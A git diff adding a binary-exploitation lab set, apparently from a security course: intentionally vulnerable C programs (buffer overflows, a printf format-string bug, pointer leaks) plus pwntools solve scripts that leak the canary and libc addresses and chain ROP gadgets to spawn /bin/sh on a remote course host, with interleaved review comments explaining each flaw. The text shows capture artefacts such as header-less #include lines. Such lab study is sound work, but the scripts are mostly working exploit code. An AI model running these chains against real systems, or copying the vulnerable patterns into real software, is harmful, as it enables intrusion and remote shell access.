diff --git a/lab3_4_recap/01_aquabank_armory/.gdb_history b/lab3_4_recap/01_aquabank_armory/.gdb_history
new file mode 100644
index 0000000..2f1dd0b
--- /dev/null
+++ b/lab3_4_recap/01_aquabank_armory/.gdb_history
@@ -0,0 +1,6 @@
+disass win
+disass main
+disass vuln
+r
+vmmap
+quit
diff --git a/lab3_4_recap/01_aquabank_armory/aquabank-armory b/lab3_4_recap/01_aquabank_armory/aquabank-armory
new file mode 100755
index 0000000..8e6a809
Binary files /dev/null and b/lab3_4_recap/01_aquabank_armory/aquabank-armory differ
diff --git a/lab3_4_recap/01_aquabank_armory/main.c b/lab3_4_recap/01_aquabank_armory/main.c
new file mode 100644
index 0000000..be5360e
--- /dev/null
+++ b/lab3_4_recap/01_aquabank_armory/main.c
@@ -0,0 +1,28 @@
+#include
+#include
+#include
+
+static void setup(void) {
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+__attribute__((naked, used)) void pop_rdi_ret(void) { __asm__("pop %rdi; ret"); }
+__attribute__((naked, used)) void pop_rsi_ret(void) { __asm__("pop %rsi; ret"); }
+__attribute__((naked, used)) void pop_rdx_ret(void) { __asm__("pop %rdx; ret"); }
+__attribute__((naked, used)) void syscall_ret(void) { __asm__("syscall; ret"); }
+
+static void vuln(void) {
+ char buf[64];
+
+ puts("[armory] Storeroom open -- pick your weapons:");
+ (void)read(STDIN_FILENO, buf, 512);
+ puts("[armory] Locking down.");
+}
+
+int main(void) {
+ setup();
+ vuln();
+ return 0;
+}
diff --git a/lab3_4_recap/01_aquabank_armory/solve.py b/lab3_4_recap/01_aquabank_armory/solve.py
new file mode 100644
index 0000000..b494b30
--- /dev/null
+++ b/lab3_4_recap/01_aquabank_armory/solve.py
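Review bot: In vuln() the read length is detached from the destination: `char buf[64]` is filled by `(void)read(STDIN_FILENO, buf, 512);`, so up to 448 bytes land past the array, and the byte count is discarded. Since this directory is a lab target the overflow is presumably intentional, but the hardened form is `ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));` followed by a check that n is positive before the buffer is used. The three `#include` directives appear without header names, which looks like an artefact of how the page was captured rather than the committed source; if it is real the file does not compile. The same read-into-smaller-buffer pattern recurs in 03_aquabank_vault/main.c (open_vault) and 04_aquabank_safe/main.c (open_safe).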
@@ -0,0 +1,36 @@
+from pwn import *
+
+OFF = 64
+context.binary = elf = ELF("./aquabank-armory", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13540)
+print(p.recvline(b"[armory] Storeroom open -- pick your weapons:\n"))
+ret = 0x000000000040101A
+syscall = 0x0000000000401324
+pop_rdi = 0x000000000040196E
+pop_rsi = 0x0000000000401977
+pop_rdx = 0x0000000000401980
+pop_rax = 0x00000000004214EB
+writable = 0x4AC000
+mov_qword_ptr_rdx_rax = 0x000000000040AB08
+shellstr = b"/bin/sh\x00"
+payload = flat(
+ b"A" * OFF,
+ p64(ret),
+ p64(pop_rdx),
+ p64(writable),
+ p64(pop_rax),
+ shellstr,
+ p64(mov_qword_ptr_rdx_rax),
+ p64(pop_rax),
+ p64(59),
+ p64(pop_rdi),
+ p64(writable),
+ p64(pop_rsi),
+ p64(0),
+ p64(pop_rdx),
+ p64(0),
+ p64(syscall),
+)
+p.sendline(payload)
+p.interactive()
diff --git a/lab3_4_recap/02_aquabank_atm/.gdb_history b/lab3_4_recap/02_aquabank_atm/.gdb_history
new file mode 100644
index 0000000..13280bf
--- /dev/null
+++ b/lab3_4_recap/02_aquabank_atm/.gdb_history
@@ -0,0 +1,30 @@
+b withdrawal
+b withdraw
+r
+got
+vmmap
+display/w ¬e
+b withdraw
+r
+display/w ¬e
+quit
+display/w note
+display/w ¬e
+3
+r
+mmap
+vmap
+vmmap
+quit
+b withdraw
+r
+vmmap
+quit
+vmmap
+r
+vmmap
+b *withdraw
+r
+vmmap
+vmmap libc
+quit
diff --git a/lab3_4_recap/02_aquabank_atm/aquabank-atm b/lab3_4_recap/02_aquabank_atm/aquabank-atm
new file mode 100755
index 0000000..52fddfb
Binary files /dev/null and b/lab3_4_recap/02_aquabank_atm/aquabank-atm differ
diff --git a/lab3_4_recap/02_aquabank_atm/aquabank-atm_patched b/lab3_4_recap/02_aquabank_atm/aquabank-atm_patched
new file mode 100755
index 0000000..ed7fdff
Binary files /dev/null and b/lab3_4_recap/02_aquabank_atm/aquabank-atm_patched differ
diff --git a/lab3_4_recap/02_aquabank_atm/find_libc.py b/lab3_4_recap/02_aquabank_atm/find_libc.py
new file mode 100644
index 0000000..0d26574
--- /dev/null
+++ b/lab3_4_recap/02_aquabank_atm/find_libc.py
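Review bot: `print(p.recvline(b"[armory] Storeroom open -- pick your weapons:\n"))` passes the banner as recvline's first positional argument, which is the `keepends` flag, so the bytes are only evaluated for truthiness and the banner is never actually matched; `print(p.recvuntil(b"[armory] Storeroom open -- pick your weapons:\n"))` is what the intent reads as and is what the sibling scripts in rop/ use. The constants from `ret` through `mov_qword_ptr_rdx_rax` are bare hex literals with no indication of what each one is; a trailing comment per constant, as rop/04_arsenal/solve.py does for `pop_rax` and `mov_qword_ptr_rdx_rax`, would let a reader check the file without re-deriving it.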
@@ -0,0 +1,18 @@
+from pwn import *
+
+context.binary = elf = ELF("./aquabank-atm_patched", checksec=False)
+p = process(elf.path)
+# p = remote("offsec.m0lecon.it", 13523)
+print(p.recvuntil(b"> "))
+for i in range(1, 400):
+ p.sendline(b"1")
+ p.recvuntil(b"Type your customer note: ")
+ payload = f"%{i}$p"
+ p.sendline(payload.encode())
+ p.recvuntil(b"> ")
+ p.sendline(b"2")
+ p.recvuntil(b"--- Your customer note ---\n")
+ addr = p.recvline()
+ if b"0x7f" in addr:
+ print(f"Address:{addr} at pos:{i}")
+ p.recvuntil(b"> ")
diff --git a/lab3_4_recap/02_aquabank_atm/ld-2.39.so b/lab3_4_recap/02_aquabank_atm/ld-2.39.so
new file mode 100755
index 0000000..64b6146
Binary files /dev/null and b/lab3_4_recap/02_aquabank_atm/ld-2.39.so differ
diff --git a/lab3_4_recap/02_aquabank_atm/libc.so.6 b/lab3_4_recap/02_aquabank_atm/libc.so.6
new file mode 100644
index 0000000..36f801c
Binary files /dev/null and b/lab3_4_recap/02_aquabank_atm/libc.so.6 differ
diff --git a/lab3_4_recap/02_aquabank_atm/main.c b/lab3_4_recap/02_aquabank_atm/main.c
new file mode 100644
index 0000000..84bc6ac
--- /dev/null
+++ b/lab3_4_recap/02_aquabank_atm/main.c
@@ -0,0 +1,76 @@
+#include
+#include
+#include
+#include
+
+#define NOTE_MAX 96
+
+static char note[NOTE_MAX];
+
+static void setup(void) {
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void banner(void) {
+ puts("=== Welcome to AquaBank ATM, v4.0 ===");
+ puts("Set a customer note, then withdraw at your convenience.");
+}
+
+static void set_note(void) {
+ printf("Type your customer note: ");
+ fflush(stdout);
+ if (!fgets(note, sizeof(note), stdin)) return;
+ note[strcspn(note, "\n")] = 0;
+ puts("Saved.");
+}
+
+static void print_note(void) {
+ puts("--- Your customer note ---");
+ printf(note);
+ puts("");
+ puts("--------------------------");
+}
+
+static void withdraw(void) {
+ char from[32];
+ char amount[32];
+ char memo[64];
+
+ printf("From account: "); fflush(stdout); fgets(from, sizeof(from), stdin);
+ printf("Amount: "); fflush(stdout); fgets(amount, sizeof(amount), stdin);
+ puts("Withdrawal memo (be brief):");
+
+ fgets(memo, 256, stdin);
+
+ printf("Queued withdrawal from %samount %s\n", from, amount);
+}
+
+static void menu(void) {
+ char line[16];
+ while (1) {
+ puts("");
+ puts("=== AquaBank ATM ===");
+ puts("1) Set customer note");
+ puts("2) Print customer note");
+ puts("3) Withdraw");
+ puts("4) Exit");
+ printf("> "); fflush(stdout);
+ if (!fgets(line, sizeof(line), stdin)) break;
+ switch (atoi(line)) {
+ case 1: set_note(); break;
+ case 2: print_note(); break;
+ case 3: withdraw(); break;
+ case 4: puts("Bye"); return;
+ default: puts("?");
+ }
+ }
+}
+
+int main(void) {
+ setup();
+ banner();
+ menu();
+ return 0;
+}
diff --git a/lab3_4_recap/02_aquabank_atm/solve.py b/lab3_4_recap/02_aquabank_atm/solve.py
new file mode 100755
index 0000000..4378958
--- /dev/null
+++ b/lab3_4_recap/02_aquabank_atm/solve.py
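Review bot: print_note() calls `printf(note)` with a buffer that set_note() fills from stdin, so the caller controls the format string; the fix is `fputs(note, stdout);` or `printf("%s", note);`. In withdraw(), `fgets(memo, 256, stdin);` reads up to 255 bytes into `char memo[64]` while the two neighbouring fgets calls correctly use `sizeof(...)`; `fgets(memo, sizeof(memo), stdin);` keeps it in bounds. withdraw() also ignores all three fgets return values, so on early EOF `from` and `amount` are printed uninitialised. As with the other lab targets these are presumably the intended exercises; the note records the hardened form.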
@@ -0,0 +1,91 @@
+#!/usr/bin/env python3
+
+from pwn import *
+
+# exe = ELF("./aquabank-atm_patched")
+exe = ELF("./aquabank-atm")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.39.so")
+
+context.binary = exe
+
+
+def conn():
+ if args.LOCAL:
+ r = process([exe.path])
+ if args.GDB:
+ gdb.attach(r)
+ else:
+ r = remote("offsec.m0lecon.it", 13523)
+
+ return r
+
+
+def main():
+ p = conn()
+ OFF = 128 # On withdrawal
+ p.recvuntil(b"> ")
+ p.sendline(b"1")
+ # payload = b"%114$p" (local offset)
+ # payload = b"%74$p" # (remote offset)
+ # payload = b"%112$p"
+ # payload = b"%33$p"
+ payload = b"%33$p"
+ p.sendline(payload)
+ p.recvuntil(b"> ")
+ p.sendline(b"2")
+ p.recvuntil(b"--- Your customer note ---\n")
+ addr = int(p.recvline().strip(), 16)
+ # libc.address = addr & ~0xFFFFF
+ libc.address = addr - libc.symbols["__libc_start_main"] - 0x8B
+ # libc.address = addr & ~0xFFF
+ print(f"Address: {hex(libc.address)}")
+ BINSH = next(libc.search(b"/bin/sh\x00"))
+ # Stage 2 write the binsh string at a fixed address (note array)
+ # binsh = b"/bin/sh"
+ # p.recvuntil(b"> ")
+ # p.sendline(b"1")
+ # p.sendline(binsh)
+ print(p.recvuntil(b"> "))
+
+ # Stage 3 Buffer overflow and system call
+ p.sendline(b"3")
+ print(p.recvuntil(b"From account: "))
+ p.sendline(b"A")
+ print(p.recvuntil(b"Amount: "))
+ p.sendline(b"10")
+ print(p.recvuntil(b"Withdrawal memo (be brief):\n"))
+ ret = 0x000000000040101A
+ ret_libc = 0x000000000002882F
+ pop_rdi = 0x000000000010F78B
+ pop_rsi = 0x0000000000110A7D
+ syscall = 0x00000000000288B5
+ pop_rax = 0x00000000000DD237
+ payload = flat(
+ b"A" * (OFF),
+ p64(ret),
+ # p64(ret_libc),
+ p64(libc.address + pop_rdi),
+ # p64(exe.symbols["note"]),
+ p64(BINSH),
+ # p64(ret_libc),
+ # p64(exe.symbols["main"]),
+ # p64(libc.symbols["puts"]),
+ p64(ret),
+ p64(libc.symbols["system"]),
+ # p64(exe.symbols["main"]),
+ # p64(libc.symbols["system"]),
+ )
+ # p.interactive()
+ p.send(payload + b"\n")
+ # p.interactive()
+ # %114$p
+ # %130$p
+
+ # good luck pwning :)
+
+ p.interactive()
+
+
+if __name__ == "__main__":
+ main()
diff --git a/lab3_4_recap/02_aquabank_atm/solve.py.bak b/lab3_4_recap/02_aquabank_atm/solve.py.bak
new file mode 100644
index 0000000..4856211
--- /dev/null
+++ b/lab3_4_recap/02_aquabank_atm/solve.py.bak
@@ -0,0 +1,55 @@
+from pwn import *
+
+OFF = 128 # On withdrawal
+# %25$lx
+context.binary = elf = ELF("./aquabank-atm", checksec=False)
+libc = ELF("libc.so.6", checksec=False)
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13508)
+PRINTF_GOT = elf.got["printf"]
+# Uso printf per stamparmi il libc address
+# Uso save note per salvarmi /bin/sh nel buffer
+# Salvo indirizzo di libc e chiamo system con /bin/sh
+p.recvuntil(b"> ")
+p.sendline(b"1")
+# payload = b"%114$p" (local offset)
+payload = b"%74$p" # (remote offset)
+p.sendline(payload)
+p.recvuntilb(b"> ")
+p.sendline(b"2")
+p.recvuntil(b"--- Your customer note ---\n")
+addr = int(p.recvline().strip(), 16)
+libc.address = addr
+print(f"Address: {hex(addr)}")
+# Stage 2 write the binsh string at a fixed address (note array)
+binsh = b"/bin/sh"
+note_addr = 0x4040A0
+p.recvuntilb(b"> ")
+p.sendline(b"1")
+p.sendline(binsh)
+print(p.recvuntilb(b"> "))
+#
+# Stage 3 Buffer overflow and system call
+p.sendline(b"3")
+print(p.recvuntil(b"From account: "))
+p.sendline(b"A")
+print(p.recvuntil(b"Amount: "))
+p.sendline(b"10")
+print(p.recvuntil(b"Withdrawal memo (be brief):\n"))
+ret = 0x000000000040101A
+ret_libc = 0x000000000002882F
+pop_rdi = 0x000000000010F78B
+payload = flat(
+ b"A" * (OFF),
+ # p64(ret),
+ p64(libc.address + pop_rdi),
+ p64(note_addr),
+ p64(
+ libc.symbols["system"],
+ ),
+)
+p.sendline(payload)
+p.interactive()
+# %114$p
+# %130$p
diff --git a/lab3_4_recap/03_aquabank_vault/.gdb_history b/lab3_4_recap/03_aquabank_vault/.gdb_history
new file mode 100644
index 0000000..e77b45e
--- /dev/null
+++ b/lab3_4_recap/03_aquabank_vault/.gdb_history
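Review bot: main() in solve.py is dominated by commented-out alternatives (the four `# payload = b"%...$p"` lines, the two `# libc.address = addr & ~...` variants, the whole Stage 2 block and the alternative entries inside flat(...)), and the file is committed next to a near-identical solve.py.bak, so it is not obvious which variant was the one actually run; keep the working variant, and move the local/remote offset history into a short header comment or the commit message. 03_aquabank_vault/solve.py and 04_aquabank_safe/solve.py have the same build-up, and the latter additionally parks an entire chain inside a triple-quoted string literal instead of deleting it. Within solve.py, `payload` is rebound from the format-string probe to the ROP chain in the same function; distinct names such as `probe` and `chain` would separate the two stages. The `# good luck pwning :)` line is the pwntools template comment and can go.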
@@ -0,0 +1,6 @@
+r
+r
+r
+r
+vmmap
+quit
diff --git a/lab3_4_recap/03_aquabank_vault/aquabank-vault b/lab3_4_recap/03_aquabank_vault/aquabank-vault
new file mode 100755
index 0000000..4ba9bda
Binary files /dev/null and b/lab3_4_recap/03_aquabank_vault/aquabank-vault differ
diff --git a/lab3_4_recap/03_aquabank_vault/aquabank-vault_patched b/lab3_4_recap/03_aquabank_vault/aquabank-vault_patched
new file mode 100755
index 0000000..7387878
Binary files /dev/null and b/lab3_4_recap/03_aquabank_vault/aquabank-vault_patched differ
diff --git a/lab3_4_recap/03_aquabank_vault/ld-2.39.so b/lab3_4_recap/03_aquabank_vault/ld-2.39.so
new file mode 100755
index 0000000..64b6146
Binary files /dev/null and b/lab3_4_recap/03_aquabank_vault/ld-2.39.so differ
diff --git a/lab3_4_recap/03_aquabank_vault/libc.so.6 b/lab3_4_recap/03_aquabank_vault/libc.so.6
new file mode 100644
index 0000000..36f801c
Binary files /dev/null and b/lab3_4_recap/03_aquabank_vault/libc.so.6 differ
diff --git a/lab3_4_recap/03_aquabank_vault/main.c b/lab3_4_recap/03_aquabank_vault/main.c
new file mode 100644
index 0000000..569144f
--- /dev/null
+++ b/lab3_4_recap/03_aquabank_vault/main.c
@@ -0,0 +1,62 @@
+#include
+#include
+#include
+#include
+
+static void setup(void) {
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void banner(void) {
+ puts("=== AquaBank Safe Deposit Vault ===");
+ puts("Insert your card to issue a receipt or open the vault.");
+}
+
+static void print_receipt(void) {
+ char buf[64];
+
+ puts("Type the receipt header (up to 64 chars):");
+ ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));
+ if (n <= 0) return;
+
+ puts("--- RECEIPT ---");
+ fwrite(buf, 1, 256, stdout);
+ puts("");
+ puts("---------------");
+}
+
+static void open_vault(void) {
+ char combo[128];
+
+ puts("Enter your combination:");
+ (void)read(STDIN_FILENO, combo, 512);
+ printf("Combination registered: %.32s ...\n", combo);
+}
+
+static void menu(void) {
+ char line[16];
+ while (1) {
+ puts("");
+ puts("=== AquaBank Vault ===");
+ puts("1) Print receipt");
+ puts("2) Open vault");
+ puts("3) Exit");
+ printf("> "); fflush(stdout);
+ if (!fgets(line, sizeof(line), stdin)) break;
+ switch (atoi(line)) {
+ case 1: print_receipt(); break;
+ case 2: open_vault(); return;
+ case 3: puts("Bye"); return;
+ default: puts("?");
+ }
+ }
+}
+
+int main(void) {
+ setup();
+ banner();
+ menu();
+ return 0;
+}
diff --git a/lab3_4_recap/03_aquabank_vault/solve.py b/lab3_4_recap/03_aquabank_vault/solve.py
new file mode 100755
index 0000000..137a6a9
--- /dev/null
+++ b/lab3_4_recap/03_aquabank_vault/solve.py
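Review bot: print_receipt() reads correctly with `ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));` but then echoes with `fwrite(buf, 1, 256, stdout);`, sending 192 bytes beyond `char buf[64]` — whatever the stack holds after it — to the client; the count should be the bytes actually received, `fwrite(buf, 1, (size_t)n, stdout);`. open_vault() has the read-past-buffer pattern already noted on 01_aquabank_armory/main.c (`combo[128]` filled with a 512-byte read), and the `%.32s` in its printf only limits the echo, not the write. The menu's `case 2: open_vault(); return;` leaves the loop after a single attempt while case 1 loops; that may be deliberate but deserves a comment.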
@@ -0,0 +1,125 @@
+#!/usr/bin/env python3
+
+from pwn import *
+
+exe = ELF("./aquabank-vault_patched")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.39.so")
+
+context.binary = exe
+
+
+def conn():
+ if args.LOCAL:
+ r = process([exe.path])
+ if args.GDB:
+ gdb.attach(r)
+ else:
+ r = remote("offsec.m0lecon.it", 13533)
+
+ return r
+
+
+def main():
+ p = conn()
+ print(p.recvuntil(b"> "))
+ p.sendline(b"1")
+ print(p.recvuntil(b"Type the receipt header (up to 64 chars):\n"))
+
+ p.sendline(b"A" * 64)
+ # p.sendline(b"A" * 1)
+ print(p.recvline())
+ # print(p.recvline()[64 + 8 : 64 + 16])
+ leak = p.recvline()
+ print(leak[64:])
+ canary = leak[64 + 8 : 64 + 16].strip()
+ # canary = canary[::-1]
+ # canary = int(canary, 16)
+ print(f"Canary:{canary} len: {len(canary)}")
+ p.recvuntil(b"> ")
+ p.sendline(b"2")
+ print(p.recvuntil(b"Enter your combination:\n"))
+ # p.interactive()
+ payload = flat(
+ # b"A" * 128,
+ b"A" * 136,
+ canary,
+ b"STOPHERE",
+ exe.symbols["print_receipt"],
+ exe.symbols["main"],
+ )
+ p.send(payload)
+ p.recvline()
+ # print(p.recvline())
+ # print(p.recvuntil(b"Enter your combination:\n"))
+ # print(p.recvuntil(b"> "))
+ # p.sendline(b"1")
+ # print(p.recvuntil(b"Type the receipt header (up to 64 chars):\n"))
+ pause()
+ p.sendline(b"A" * 64)
+ p.recvline()
+ p.recvline()
+
+ first_leak = p.recvline()[64:].strip()
+ print(f"Leak: {first_leak} len: {len(first_leak)}")
+ leak = p.recvline().strip()
+ first_leak += leak
+ count = 0
+ addr = 0
+ for i in range(len(first_leak)):
+ if first_leak[i] == 0x7F:
+ addr_raw = first_leak[i : i - 6 : -1].strip()
+ addr = int.from_bytes(addr_raw, byteorder="big")
+ if count == 4:
+ print(f"Address: {hex(addr)}")
+ break
+ count = count + 1
+ # FIFTH INDEX (5)
+ # for i in range(23):
+ # print(f"Address - puts:{hex(addr - libc.symbols['puts'])}")
+ # print(f"Address - read:{hex(addr - libc.symbols['read'])}")
+ # print(f"Address - fwrite:{hex(addr - libc.symbols['fwrite'])}")
+ print(f"Address - start_main:{hex(addr - libc.symbols['__libc_start_main'] + 54)}")
+ libc.address = addr - libc.symbols["__libc_start_main"] + 54
+ print(p.recvuntil(b"> "))
+ p.sendline(b"2")
+ print(p.recvuntil(b"Enter your combination:\n"))
+ pop_rdi = 0x000000000010F78B
+ ret_libc = 0x000000000002882F
+ ret = 0x000000000040101A
+ BINSH = next(libc.search(b"/bin/sh\x00"))
+ ropchain = flat(
+ b"A" * 136,
+ canary,
+ p64(ret),
+ p64(libc.address + pop_rdi),
+ BINSH,
+ p64(ret),
+ # p64(libc.symbols["puts"]),
+ p64(libc.symbols["system"]),
+ )
+ p.sendline(ropchain)
+ p.interactive()
+ # print(f"Address - printf:{hex(addr - libc.symbols['printf'])}")
+ # print(f"Address - setvbuf:{hex(addr - libc.symbols['setvbuf'])}")
+ # addr = first_leak[i * 8 : (i * 8) + 9]
+ # addr = addr[::-1]
+ # print(f"Address: {addr}")
+
+ # pause()
+ # p.sendline(b"A" * 1)
+ # leak = p.recvline()
+ # print(f"LEAK:{leak[64:]}")
+ # print(p.recvline())
+ # print(p.recvline())
+ # print(p.recvline()[64 + 8 : 64 + 16])
+ # leak = p.recvline()
+ # print(leak[64:])
+ # p.interactive()
+ # good luck pwning :)
+
+ # p.interactive()
+
+
+if __name__ == "__main__":
+ main()
diff --git a/lab3_4_recap/04_aquabank_safe/.gdb_history b/lab3_4_recap/04_aquabank_safe/.gdb_history
new file mode 100644
index 0000000..6d7b821
--- /dev/null
+++ b/lab3_4_recap/04_aquabank_safe/.gdb_history
@@ -0,0 +1,26 @@
+disass deposit
+b *0x000000000000135f
+r
+b deposit
+r
+r
+clear
+clear 1
+quit
+b deposit
+r
+disass deposit
+b *0x000055555555535c
+c
+info registers
+disass deposit
+disass open_safe
+r
+b open_safe
+r
+disass open_safe
+b *0x00005555555553f5
+c
+disass open_safe
+info registers
+disass deposit
diff --git a/lab3_4_recap/04_aquabank_safe/aquabank-safe b/lab3_4_recap/04_aquabank_safe/aquabank-safe
new file mode 100755
index 0000000..070adf9
Binary files /dev/null and b/lab3_4_recap/04_aquabank_safe/aquabank-safe differ
diff --git a/lab3_4_recap/04_aquabank_safe/aquabank-safe_patched b/lab3_4_recap/04_aquabank_safe/aquabank-safe_patched
new file mode 100755
index 0000000..d2eded9
Binary files /dev/null and b/lab3_4_recap/04_aquabank_safe/aquabank-safe_patched differ
diff --git a/lab3_4_recap/04_aquabank_safe/ld-2.39.so b/lab3_4_recap/04_aquabank_safe/ld-2.39.so
new file mode 100755
index 0000000..64b6146
Binary files /dev/null and b/lab3_4_recap/04_aquabank_safe/ld-2.39.so differ
diff --git a/lab3_4_recap/04_aquabank_safe/libc.so.6 b/lab3_4_recap/04_aquabank_safe/libc.so.6
new file mode 100644
index 0000000..36f801c
Binary files /dev/null and b/lab3_4_recap/04_aquabank_safe/libc.so.6 differ
diff --git a/lab3_4_recap/04_aquabank_safe/main.c b/lab3_4_recap/04_aquabank_safe/main.c
new file mode 100644
index 0000000..76f832d
--- /dev/null
+++ b/lab3_4_recap/04_aquabank_safe/main.c
@@ -0,0 +1,67 @@
+#include
+#include
+#include
+#include
+
+static void setup(void) {
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void banner(void) {
+ puts("=== AquaBank Premium Safe ===");
+ puts("PIE-protected vault. No leaks. (Or are there?)");
+}
+
+char vault[0x4000];
+
+static void deposit(void) {
+ int n;
+ printf("[deposit] Vault deposit size (bytes): ");
+ if (scanf("%d", &n) != 1) return;
+ int c; while ((c = getchar()) != '\n' && c != EOF) {}
+ if (n < 0 || n > (int)sizeof(vault)) { puts("bad size"); return; }
+ printf("[deposit] Send %d bytes:\n", n);
+ (void)read(STDIN_FILENO, vault, n);
+ puts("[deposit] Deposit registered.");
+}
+
+static void diagnostics(void) {
+ printf("[diag] printf @ %p\n", (void*)printf);
+ printf("[diag] entry @ %p\n", (void*)&diagnostics);
+}
+
+static void open_safe(void) {
+ char buf[8];
+ puts("[safe] Enter the 24-byte combination:");
+ (void)read(STDIN_FILENO, buf, 24);
+}
+
+static void menu(void) {
+ char line[16];
+ while (1) {
+ puts("");
+ puts("=== AquaBank Premium Safe ===");
+ puts("1) Diagnostics");
+ puts("2) Vault deposit");
+ puts("3) Open safe");
+ puts("4) Exit");
+ printf("> "); fflush(stdout);
+ if (!fgets(line, sizeof(line), stdin)) break;
+ switch (atoi(line)) {
+ case 1: diagnostics(); break;
+ case 2: deposit(); break;
+ case 3: open_safe(); return;
+ case 4: puts("Bye"); return;
+ default: puts("?");
+ }
+ }
+}
+
+int main(void) {
+ setup();
+ banner();
+ menu();
+ return 0;
+}
diff --git a/lab3_4_recap/04_aquabank_safe/solve.py b/lab3_4_recap/04_aquabank_safe/solve.py
new file mode 100755
index 0000000..ba88991
--- /dev/null
+++ b/lab3_4_recap/04_aquabank_safe/solve.py
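Review bot: open_safe() declares `char buf[8]` and then executes `(void)read(STDIN_FILENO, buf, 24);`, so the prompt ("24-byte combination") and the storage disagree; either size the buffer for 24 bytes or read `sizeof(buf)`. diagnostics() prints `(void*)printf` and `(void*)&diagnostics` with `%p`, which discloses the libc and executable load addresses and cancels the PIE/ASLR the banner advertises; a diagnostics path in a real build should not emit code pointers at all. deposit() does bound n against `sizeof(vault)` before the read, which is the pattern the other two reads in this series lack, but like them it discards the read() return value.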
@@ -0,0 +1,122 @@
+#!/usr/bin/env python3
+
+from pwn import *
+
+exe = ELF("./aquabank-safe_patched")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.39.so")
+
+context.binary = exe
+
+
+def conn():
+ if args.LOCAL:
+ r = process([exe.path])
+ if args.GDB:
+ gdb.attach(r)
+ else:
+ r = remote("offsec.m0lecon.it", 13502)
+
+ return r
+
+
+def main():
+ p = conn()
+ # Stage 1 take the libc base address and PIE base address
+ print(p.recvuntil(b"> "))
+ p.sendline(b"1")
+ printf = int(p.recvline().split(b"@")[1].strip(), 16)
+ diagnostics = int(p.recvline().split(b"@")[1].strip(), 16)
+ libc.address = printf - libc.symbols["printf"]
+ base_pie = diagnostics - exe.symbols["diagnostics"]
+ print(hex(libc.address))
+ print(hex(base_pie))
+ #
+ # Save ropchain in the buffer
+ print(p.recvuntil(b"> "))
+ p.sendline(b"2")
+ print(p.recvuntil(b"[deposit] Vault deposit size (bytes): "))
+ # p.interactive()
+ p.sendline(b"16000")
+ # p.send(b"\n")
+ print(p.recvline())
+
+ BINSH = next(libc.search(b"/bin/sh\x00"))
+ ret = base_pie + 0x000000000000101A
+ pop_rdi = libc.address + 0x000000000010F78B
+ pop_rsi = libc.address + 0x0000000000110A7D
+ pop_rax = libc.address + 0x00000000000DD237
+ xchg_edx_eax = libc.address + 0x000000000011EA8A
+ ret_libc = libc.address + 0x000000000002882F
+ rop_chain = flat(
+ # p64(ret),
+ # b"A" * 16,
+ b"A" * 8,
+ # p64(0x0),
+ p64(ret_libc),
+ p64(pop_rax),
+ p64(0),
+ p64(pop_rdi),
+ BINSH,
+ p64(pop_rsi),
+ p64(0),
+ p64(xchg_edx_eax),
+ # p64(base_pie + exe.symbols["menu"]),
+ # b"A" * 128,
+ p64(ret_libc),
+ p64(libc.symbols["execve"]),
+ # p64(libc.symbols["puts"]),
+ )
+ p.sendline(rop_chain)
+ #
+ # BOF and return to vault
+ print(p.recvuntil(b"> "))
+ p.sendline(b"3")
+ print(p.recvline())
+ # Move the stack point to vault where the ROP Chain is.
+ # pop_rsp = base_pie + 0x000000000003C068
+ # leave -> mov rsp, rbp pop rbp ( so we set target - 8 bytes)
+ # leave = libc.address + 0x00000000000299D2
+ leave = base_pie + 0x0000000000001385
+ pop_rsp = libc.address + 0x000000000003C068
+ print(f"Vault addr:{hex(base_pie + exe.symbols['vault'])}")
+ payload = flat(
+ b"A" * 8,
+ # p64(leave),
+ # p64(base_pie + exe.symbols["vault"]),
+ # p64(leave),
+ # p64(ret),
+ # p64(pop_rsp),
+ # b"B" * 8,
+ p64(base_pie + exe.symbols["vault"]),
+ # p64(base_pie + exe.symbols["vault"]),
+ p64(leave),
+ )
+ print(f"Payload len:{len(payload)}")
+ context.terminal = ["alacritty", "-e", "sh", "-c"]
+ # gdb.attach(p)
+ # pause()
+ p.sendline(payload)
+ # p.send(b"\n")
+
+ # We switch to the read function in deposit
+ """final_p = flat(
+ b"A" * 0x4000,
+ p64(ret),
+ p64(pop_rdi),
+ BINSH,
+ p64(ret),
+ p64(
+ libc.symbols["system"],
+ ),
+ )"""
+ # p.send(final_p)
+ # print(p.recvuntil(b"[safe] Enter the 24-byte combination:\n"))
+ # print(p.recvline())
+ # p.interactive()
+ # good luck pwning :)
+ p.interactive()
+
+
+if __name__ == "__main__":
+ main()
diff --git a/ret2libc/01_neon_diner/.gdb_history b/ret2libc/01_neon_diner/.gdb_history
new file mode 100644
index 0000000..a3e9e92
--- /dev/null
+++ b/ret2libc/01_neon_diner/.gdb_history
@@ -0,0 +1,2 @@
+r
+quit
diff --git a/rop/01_toolkit/.gdb_history b/rop/01_toolkit/.gdb_history
new file mode 100644
index 0000000..cc6d42a
--- /dev/null
+++ b/rop/01_toolkit/.gdb_history
@@ -0,0 +1,11 @@
+r
+disass win
+disass main
+disass main
+disass win
+quit
+disass win
+disass main
+disass wuln
+disass vuln
+quit
diff --git a/rop/01_toolkit/solve.py b/rop/01_toolkit/solve.py
new file mode 100644
index 0000000..059fc74
--- /dev/null
+++ b/rop/01_toolkit/solve.py
@@ -0,0 +1,31 @@
+from pwn import *
+
+OFFSET = 64
+context.binary = elf = ELF("./toolkit", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13554)
+
+var1 = 0x1111111111111111
+var2 = 0x2222222222222222
+var3 = 0x3333333333333333
+
+pop_rdi = 0x00000000004011FF
+pop_rdx = 0x0000000000401211
